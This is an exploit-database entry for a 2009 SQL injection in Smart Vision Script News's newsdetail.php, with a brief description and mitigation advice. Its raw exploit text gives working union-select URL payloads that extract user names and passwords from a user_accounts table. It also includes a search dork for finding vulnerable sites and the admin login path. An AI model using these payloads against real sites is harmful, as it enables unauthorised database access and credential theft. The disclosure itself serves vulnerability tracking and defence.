Smart Vsion Script News (newsdetail) SQL Injection Vulnerability

vendor:

Script News (newsdetail)

by:

Err0R

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Script News (newsdetail)

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Smart Vsion Script News (newsdetail) SQL Injection Vulnerability

A SQL injection vulnerability exists in Smart Vision Script News (newsdetail) which allows an attacker to execute arbitrary SQL commands on the vulnerable system. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by sending a specially crafted URL to the vulnerable application. The URL contains malicious SQL commands that are executed on the vulnerable system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Smart Vsion Script News (newsdetail) SQL Injection Vulnerability
# Software Link: www.esmart-vision.com<http://www.esmart-vision.com/>


============================================
| Smart Vision Script News ( newsdetail ) SQL Injection Vulnerability
============================================
# (+) Author: Err0R
# (+) Site : www.sa-hacker.com/vb<http://www.sa-hacker.com/vb>
# (+) Email : a5q@hotmail.com<mailto:a5q@hotmail.com>
=====================================
~~~~~~~~~~~~~~~~~~~~
dork : Come from home Script ( Latest Project ) www.esmart-vision.com<http://www.esmart-vision.com/>
~~~~~~~~~~~~~~~~~~~~
Exploit : Site /path/newsdetail.php?id=-12+union+select+1,2,3,4,5,6,7--
And you come the enject ,,
Demo :-
User name : http://server/newsdetail.php?id=-12+union+select+1,user_name,3,4,5,6,7+from+zagrosle_zagros.user_accounts<http://server/newsdetail.php?id=-12+union+select+1,user_name,3,4,5,6,7+from+zagrosle_zagros.user_accounts>--
Password : http://server/newsdetail.php?id=-12+union+select+1,password,3,4,5,6,7+from+zagrosle_zagros.user_accounts<http:http://server/newsdetail.php?id=-12+union+select+1,password,3,4,5,6,7+from+zagrosle_zagros.user_accounts>--
admin Login : Site /path/admin/admin.php
=============================================================
#====GreeTZ===================#
#all member in www.sa-hacker.com/vb<http://www.sa-hacker.com/vb> #
#and all in My email : ) #
#============================#